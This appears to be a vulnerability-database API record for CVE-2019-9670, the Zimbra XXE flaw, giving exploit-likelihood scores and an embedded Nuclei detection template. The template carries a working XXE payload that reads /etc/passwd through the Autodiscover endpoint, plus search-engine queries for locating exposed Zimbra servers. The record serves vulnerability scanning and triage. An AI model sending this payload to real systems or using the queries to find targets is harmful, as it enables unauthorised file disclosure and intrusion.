{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2019-9670/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2019-9670/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2019-9670/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2019-9670/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2019-9670/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2019-9670"},"sightings":{"href":"/api/v1/sightings/cve-2019-9670"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99986,"kev":true,"percentile":0.99983},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2019/CVE-2019-9670.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2019-9670\n\ninfo:\n  name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection\n  author: ree4pwn\n  severity: critical\n  description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information.\n  remediation: |\n    Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/46693/\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n    - https://bugzilla.zimbra.com/show_bug.cgi?id=109129\n    - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce\n    - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html\n    - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-9670\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-9670\n    cwe-id: CWE-611\n    epss-score: 0.99986\n    epss-percentile: 0.99983\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n    google-query:\n      - intitle:\"zimbra collaboration suite\"\n      - intitle:\"zimbra web client sign in\"\n  tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /Autodiscover/Autodiscover.xml HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n\n        <!DOCTYPE xxe [\n        <!ELEMENT name ANY >\n        <!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n        <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n        <Request>\n        <EMailAddress>aaaaa</EMailAddress>\n        <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n        </Request>\n        </Autodiscover>\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'root:.*:0:0:'\n          - \"Problem accessing\"\n        condition: and\n\n      - type: status\n        status:\n          - 503\n# digest: 490a00463044022035fcdfcc52b7edb45726c3e37d9c78d6c70b36e63c51892b4edcf4c947765d7d022073a19d1a2ae72fb79c5fd4bf0c1b6fe076c6ec84df7247162f832bc11b140559:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2019-9670"}